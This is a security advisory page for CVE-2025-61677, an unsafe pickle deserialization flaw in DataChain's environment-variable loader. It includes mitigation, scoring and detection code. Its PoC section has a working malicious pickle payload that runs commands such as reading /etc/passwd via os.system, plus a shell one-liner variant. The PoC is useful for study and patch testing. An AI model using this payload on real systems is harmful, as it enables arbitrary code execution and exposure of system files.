CVE-2025-61677

Description

DataChain is a Python-based AI-data warehouse for transforming and analyzing unstructured data. Versions 0.34.1 and below deserialize untrusted data: the loader.py module reads serialized objects from environment variables (such as DATACHAIN__METASTORE and DATACHAIN__WAREHOUSE) and deserializes them. An attacker who can set these environment variables can trigger code execution when the application loads. This issue is fixed in version 0.34.2.
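The weakness class described here (CWE-502) arises whenever an environment-supplied string reaches a deserializer that can construct arbitrary objects. A common mitigation is to accept only plain data and map it onto an explicit allowlist of classes. The sketch below illustrates that idea only; it is not DataChain's actual fix, and `SQLiteBackend`, `ALLOWED_BACKENDS`, `load_backend`, and the `EXAMPLE__BACKEND` variable are hypothetical names chosen for illustration.

```python
import json
import os


class SQLiteBackend:
    """Hypothetical stand-in for a storage backend class."""

    def __init__(self, path=":memory:"):
        self.path = path


# Only classes listed here can ever be constructed from the environment.
ALLOWED_BACKENDS = {"sqlite": SQLiteBackend}


def load_backend(env_var="EXAMPLE__BACKEND"):
    """Build a backend from a JSON spec in env_var, or return None if unset."""
    raw = os.environ.get(env_var)
    if not raw:
        return None
    spec = json.loads(raw)  # parses data only; cannot invoke callables
    if not isinstance(spec, dict):
        raise ValueError("backend spec must be a JSON object")
    name = spec.get("backend")
    if not isinstance(name, str) or name not in ALLOWED_BACKENDS:
        raise ValueError(f"backend {name!r} is not allowlisted")
    kwargs = spec.get("kwargs", {})
    if not isinstance(kwargs, dict):
        raise ValueError("kwargs must be a JSON object")
    return ALLOWED_BACKENDS[name](**kwargs)
```

With this shape, a value such as `{"backend": "sqlite", "kwargs": {"path": "/tmp/x.db"}}` yields a backend, while any name outside the allowlist is rejected before anything is constructed.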

CVSS Details

CVSS Score: 2.5

Severity: LOW

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N
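The 2.5 score can be reproduced from the vector with the CVSS v3.1 base-score equations. The following is a minimal sketch that handles only Scope: Unchanged vectors such as this one; the function names `roundup` and `base_score` are illustrative, and the weights are the ones published in the CVSS v3.1 specification.

```python
import math

# Metric weights from the CVSS v3.1 specification (Scope: Unchanged values).
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "PR": {"N": 0.85, "L": 0.62, "H": 0.27},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}


def roundup(x):
    """Round up to one decimal place, as defined in the CVSS v3.1 spec."""
    i = round(x * 100000)
    if i % 10000 == 0:
        return i / 100000.0
    return (math.floor(i / 10000) + 1) / 10.0


def base_score(vector):
    """Compute the base score for a Scope: Unchanged CVSS v3.1 vector."""
    # Skip the leading "CVSS:3.1" prefix, then split each "KEY:VALUE" pair.
    metrics = dict(part.split(":") for part in vector.split("/")[1:])
    if metrics["S"] != "U":
        raise ValueError("this sketch only handles Scope: Unchanged")
    w = {key: WEIGHTS[key][metrics[key]] for key in WEIGHTS}
    iss = 1 - (1 - w["C"]) * (1 - w["I"]) * (1 - w["A"])
    impact = 6.42 * iss
    exploitability = 8.22 * w["AV"] * w["AC"] * w["PR"] * w["UI"]
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))


print(base_score("CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N"))  # 2.5
```

The intermediate values are about 1.05 for exploitability and 1.41 for impact, which agree with the rounded sub-scores of 1.0 and 1.4 in the raw record.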

Configurations (Affected Products)

No CPE configuration data available. Affected package:

iterative/datachain <= 0.34.1
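To check whether an installed copy falls in the affected range, the version can be compared against 0.34.2. This is a rough sketch: it assumes the distribution is installed under the name `datachain`, compares only the leading numeric components, and ignores pre-release suffixes, so a dedicated version parser is preferable for anything beyond a quick check. The helper names are illustrative.

```python
import re
from importlib import metadata

FIXED_VERSION = (0, 34, 2)  # first patched release according to the advisory


def parse_version(text):
    """Return the leading dotted-integer part of a version as a tuple."""
    match = re.match(r"\d+(?:\.\d+)*", text)
    if match is None:
        raise ValueError(f"unrecognized version string: {text!r}")
    return tuple(int(part) for part in match.group().split("."))


def is_affected(version_text):
    """True if version_text is older than the first patched release."""
    return parse_version(version_text) < FIXED_VERSION


def installed_datachain_is_affected():
    """Return True or False for the installed package, None if not installed."""
    try:
        return is_affected(metadata.version("datachain"))
    except metadata.PackageNotFoundError:
        return None
```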

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-61677 PoC - DataChain Unsafe Deserialization via Environment Variables
# This PoC demonstrates how an attacker can exploit the unsafe deserialization
# vulnerability in DataChain <= 0.34.1 by setting malicious environment variables.

import os
import pickle
import base64

class ExploitPayload:
    """Malicious pickle payload that executes arbitrary code upon deserialization."""
    def __reduce__(self):
        # Command to execute when the payload is deserialized
        cmd = "id; whoami; cat /etc/passwd | head -5"
        return (os.system, (cmd,))

def generate_payload():
    """Generate a base64-encoded malicious pickle payload."""
    payload = pickle.dumps(ExploitPayload())
    encoded = base64.b64encode(payload).decode()
    return encoded

def exploit():
    """
    Step 1: Generate the malicious serialized payload.
    Step 2: Set it as the DATACHAIN__METASTORE environment variable.
    Step 3: Trigger DataChain to read the environment variable, causing code execution.
    """
    payload = generate_payload()
    print(f"[*] Generated payload: {payload[:50]}...")

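    # Set both environment variables named in the advisory to the payload
    os.environ["DATACHAIN__METASTORE"] = payload
    os.environ["DATACHAIN__WAREHOUSE"] = payload

    print("[*] Environment variables set with malicious payload")
    print("[*] Calling into DataChain to trigger deserialization...")

    # The advisory places the vulnerable deserialization in loader.py. The
    # entry point used here is unverified and may not exist in every release.
    try:
        from datachain.config import load_config
        config = load_config()
    except ImportError as e:
        # Entry point not found: nothing was deserialized, so no code ran.
        print(f"[-] Entry point unavailable, payload not triggered: {e}")
    except Exception as e:
        # os.system returns an int rather than a backend object, so an
        # error after the command has already run is plausible.
        print(f"[*] Exception raised during load: {e}")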

if __name__ == "__main__":
    exploit()

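# Alternative exploitation method (payload built from the shell). The -c script
# spans several lines because a class statement cannot follow ';' on one line:
# export DATACHAIN__METASTORE="$(python3 -c '
# import pickle, base64, os
# class P:
#     def __reduce__(self): return (os.system, ("touch /tmp/pwned",))
# print(base64.b64encode(pickle.dumps(P())).decode())
# ')"
# python3 -c "import datachain"  # triggers only if this reaches loader.py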
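Payloads built like the PoC above can be triaged without loading them. The sketch below uses the standard library's `pickletools.genops` to list opcodes that import names or call them, which plain-data pickles do not need. It is a heuristic for inspection, not a safe-unpickling mechanism; `SUSPICIOUS_OPCODES`, `suspicious_opcodes`, and the `Harmless` class are illustrative names.

```python
import base64
import pickle
import pickletools

# Opcodes that import a global or invoke a callable during unpickling.
SUSPICIOUS_OPCODES = {
    "GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX",
}


def suspicious_opcodes(encoded):
    """List risky opcode names in a base64-encoded pickle without loading it."""
    data = base64.b64decode(encoded)
    # genops only walks the opcode stream; it never executes the pickle.
    return {op.name for op, _arg, _pos in pickletools.genops(data)
            if op.name in SUSPICIOUS_OPCODES}


class Harmless:
    """Same shape as the PoC payload, but the callable is the builtin len."""

    def __reduce__(self):
        return (len, ("abc",))


encoded = base64.b64encode(pickle.dumps(Harmless())).decode()
print(sorted(suspicious_opcodes(encoded)))
```

A pickle of plain containers and scalars produces an empty set, so a non-empty result is a reasonable signal that a value warrants closer inspection before anything deserializes it.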

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-61677
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-61677
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-61677/
[4] VulDB https://vuldb.com/cve/CVE-2025-61677
[5] GitHub commit https://github.com/iterative/datachain/commit/914b95610620d50c8d9bee506ccbfa7d4d57fdc0
[6] GitHub pull request https://github.com/iterative/datachain/pull/1358
[7] GitHub Security Advisory https://github.com/iterative/datachain/security/advisories/GHSA-6px8-mr29-cj4r

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-61677", "sourceIdentifier": "[email protected]", "published": "2025-10-03T22:15:32.390", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "DataChain is a Python-based AI-data warehouse for transforming and analyzing unstructured data. Versions 0.34.1 and below allow for deseriaization of untrusted data because of the way the DataChain library reads serialized objects from environment variables (such as DATACHAIN__METASTORE and DATACHAIN__WAREHOUSE) in the loader.py module. An attacker with the ability to set these environment variables can trigger code execution when the application loads. This issue is fixed in version 0.34.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 2.5, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.0, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://github.com/iterative/datachain/commit/914b95610620d50c8d9bee506ccbfa7d4d57fdc0", "source": "[email protected]"}, {"url": "https://github.com/iterative/datachain/pull/1358", "source": "[email protected]"}, {"url": "https://github.com/iterative/datachain/security/advisories/GHSA-6px8-mr29-cj4r", "source": "[email protected]"}]}}
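The record above nests the score, weakness, and reference fields several levels deep. As a small illustration of reading that structure, the sketch below pulls the main fields from a trimmed copy of the record; `RECORD` keeps only the keys it reads, and `summarize` is an illustrative helper, not part of any NVD tooling.

```python
import json

# Trimmed copy of the record above; only the fields read below are kept.
RECORD = json.loads("""
{"cve": {"id": "CVE-2025-61677",
  "metrics": {"cvssMetricV31": [
    {"cvssData": {"baseScore": 2.5, "baseSeverity": "LOW"}}]},
  "weaknesses": [{"description": [{"lang": "en", "value": "CWE-502"}]}],
  "references": [{"url": "https://github.com/iterative/datachain/pull/1358"}]}}
""")


def summarize(record):
    """Flatten the fields most readers want from an NVD-style CVE record."""
    cve = record["cve"]
    cvss = cve["metrics"]["cvssMetricV31"][0]["cvssData"]
    return {
        "id": cve["id"],
        "score": cvss["baseScore"],
        "severity": cvss["baseSeverity"],
        "cwes": [d["value"] for w in cve["weaknesses"] for d in w["description"]],
        "urls": [r["url"] for r in cve["references"]],
    }


print(summarize(RECORD))
```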